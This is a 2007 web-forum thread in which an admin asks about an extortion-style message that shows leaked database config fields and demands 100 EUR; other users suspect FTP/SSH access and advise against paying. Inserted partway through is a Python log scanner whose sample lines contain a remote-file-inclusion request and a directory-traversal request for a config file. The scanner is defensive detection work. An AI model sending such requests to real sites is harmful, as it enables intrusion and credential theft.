Possible security hole


mrpotatohead
03-28-2007, 04:45 PM
Hi guys,

I got a message through PM today with the following contained:

"Dear admin, thank you for your interest.

As you have read at www.paradox-security.de.vu I checked your homepage and found critical security holes.


Proof:
Your SQL Data of the forum
$config['Database']['dbname'] = **removed for purposes of post**;
$config['MasterServer']['servername'] = **removed for purposes of post**
$config['MasterServer']['port'] =**removed for purposes of post**
$config['MasterServer']['username'] = **removed for purposes of post**
$config['MasterServer']['password'] = **removed for purposes of post**




And a part of your document root structure:


[barcrawl] DIR 05.03.2007 19:44:19 joemcd/joemcd drwxr-xr-x Info
[bbwebsite] DIR 03.01.2007 17:06:42 joemcd/joemcd drwxr-xr-x Info
[celebritybb] DIR 03.01.2007 17:06:42 joemcd/joemcd drwxr-xr-x Info
[cgi-bin] DIR 01.08.2006 19:23:42 joemcd/joemcd drwxr-xr-x Info
[contact] DIR 03.01.2007 17:06:32 joemcd/joemcd drwxr-xr-x Info
[dump] DIR 03.01.2007 17:06:36 joemcd/joemcd drwxr-xr-x Info
[faq] DIR 03.01.2007 17:09:17 joemcd/joemcd drwxr-xr-x Info
[forums] DIR 18.01.2007 09:27:29 joemcd/joemcd drwxr-xr-x Info
[frozen-illusion] DIR 03.01.2007 17:09:17 joemcd/joemcd drwxr-xr-x Info
[frozenillusion] DIR 06.02.2007 22:39:18 joemcd/joemcd drwxr-xr-x Info
[jmcdesig] DIR 20.08.2006 12:47:31 joemcd/joemcd drwxr-xr-x Info
[jmcdesigns] DIR 03.01.2007 17:06:42 joemcd/joemcd drwxr-xr-x Info
[newsfeed] DIR 03.01.2007 17:06:37 joemcd/joemcd drwxr-xr-x Info
[newsletter] DIR 03.01.2007 17:09:12 joemcd/joemcd drwxr-xr-x Info
[nutv] DIR 08.03.2007 17:23:58 joemcd/joemcd drwxr-xr-x Info
[portal] DIR 03.01.2007 17:06:42 joemcd/joemcd drwxr-xr-x Info
[research] DIR 27.01.2007 16:12:06 joemcd/joemcd drwxr-xr-x Info
[sifr] DIR 03.01.2007 17:09:17 joemcd/joemcd drwxr-xr-x Info





This security hole is very critical as you can see, because the attacker has complete Server access.

If you want to know more I'll give you my paypal address to transfer the money (100 EUR), otherwise I wish you good luck, and I hope that I could help you.

greez
paradoX


Please don't reply to this PM. For contact write an email."

What can I do to improve the security? Any idea what this security hole is?!

I'm changing all my passwords now...


- Joe

nexialys
03-28-2007, 04:50 PM
thru PM where?!

it is not a security hole, you have someone with ftp access to your server, and this is not related to vBulletin... ask your HOST to verify the accesses...

and how i read this, you hired a moron to check for your security, and he is proving his stupidity by telling you nothing about your security holes...

don't pay him the 100$ he requires....

mrpotatohead
03-28-2007, 04:58 PM
It was through PM on my website - and that's the thing, never asked anyone for any security advice! But will look in to this - thanks! :)

bashy
03-29-2007, 03:47 PM
What you want to be asking yourself is, How did he get this info?

Proof:
Your SQL Data of the forum
$config['Database']['dbname'] = **removed for purposes of post**;
$config['MasterServer']['servername'] = **removed for purposes of post**
$config['MasterServer']['port'] =**removed for purposes of post**
$config['MasterServer']['username'] = **removed for purposes of post**
$config['MasterServer']['password'] = **removed for purposes of post**

Reeve of shinra
03-29-2007, 05:51 PM
He must have ftp or ssh access to your site...

Calash
03-29-2007, 07:15 PM
Could be done with a shell script, or if it is shared hosting there may be a permission issue allowing others on the same server/cluster read access to your files...hard to say.

Changing the passwords is the first step, next would be to review your log files from before you got that email. Look for odd requests that contain URLs or other data. It will take a bit but you may be able to locate how he got the info.
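Calash's suggestion to go back through the access logs for odd requests, as an added example that is not part of this thread or of vBulletin: a small Python scanner over a few constructed Apache combined-format log lines. It flags query values that carry a remote URL or a directory-traversal sequence, which are the two request shapes most likely to explain how a config file ended up in someone else's hands. The log lines, IP addresses, paths and the function names (`scan_log`, `suspicious_params`, `offenders`) are all constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qsl

# Constructed sample Apache "combined" access-log lines (not taken from the thread).
# The last two mimic the kind of odd request Calash suggests looking for.
SAMPLE_LOG = """\
203.0.113.5 - - [27/Mar/2007:22:10:01 +0000] "GET /forums/index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Mar/2007:22:10:07 +0000] "GET /forums/showthread.php?t=42 HTTP/1.1" 200 8820 "-" "Mozilla/5.0"
198.51.100.9 - - [27/Mar/2007:23:41:12 +0000] "GET /portal/index.php?page=http://198.51.100.9/x.txt? HTTP/1.0" 200 310 "-" "libwww-perl/5.805"
198.51.100.9 - - [27/Mar/2007:23:41:15 +0000] "GET /newsfeed/view.php?file=../../../forums/includes/config.php HTTP/1.0" 200 1211 "-" "libwww-perl/5.805"
"""

# One combined-format line: ip ident user [timestamp] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# A full URL inside a parameter value is the classic remote-file-inclusion shape;
# "../" (or "..\") in a value or in the path is the classic traversal shape.
URL_IN_VALUE = re.compile(r'\b(?:https?|ftp)://', re.IGNORECASE)
TRAVERSAL = re.compile(r'(?:\.\./|\.\.\\)')


def suspicious_params(target):
    """Return a list of (parameter, reason) for a request target worth a manual look."""
    parts = urlsplit(target)
    findings = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already percent-decoded once; a second pass also catches
        # double-encoded sequences such as %252e%252e%252f.
        decoded = unquote(value)
        if URL_IN_VALUE.search(decoded):
            findings.append((name, "remote URL in parameter"))
        elif TRAVERSAL.search(decoded):
            findings.append((name, "directory traversal in parameter"))
    if TRAVERSAL.search(unquote(parts.path)):
        findings.append(("<path>", "directory traversal in path"))
    return findings


def scan_log(text):
    """Parse each access-log line and return the entries that need human review."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            # Malformed line: skip it here; a real review should at least count these.
            continue
        findings = suspicious_params(m.group("target"))
        if findings:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "target": m.group("target"),
                "status": m.group("status"),
                "findings": findings,
            })
    return hits


def offenders(hits):
    """Count flagged requests per source IP so the noisiest client stands out."""
    counts = {}
    for hit in hits:
        counts[hit["ip"]] = counts.get(hit["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    flagged = scan_log(SAMPLE_LOG)
    for hit in flagged:
        print(hit["ts"], hit["ip"], hit["status"], hit["target"])
        for param, reason in hit["findings"]:
            print("    ", param, "->", reason)
    print("per-IP totals:", offenders(flagged))
```

A status of 200 on a flagged request is the line to chase first: a 404 means the server refused or could not find the file, while a 200 with a small body on a traversal request is consistent with a script having echoed the requested file back. On shared hosting the same review should be paired with checking that the forum's config file is not world-readable, which is the other possibility Calash raises.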

moorediddy
04-02-2007, 07:43 PM
Anyone else getting this? I got the same exact message on mine... it's obviously from an FTP/SSH access to my config files.

bashy
04-03-2007, 06:53 PM
you both ain't on the same server are you?
Perhaps someone is accessing the information using ssh that's not secured?

mlomenzo
08-13-2007, 05:59 PM
I agree that it seems like someone has ftp access to your site. Definitely check with your hosting company. Post an update when you know what's going on.

Good Luck
Mike

tipoboy
08-13-2007, 07:38 PM
this thread was started in april lol:) it's now august:confused: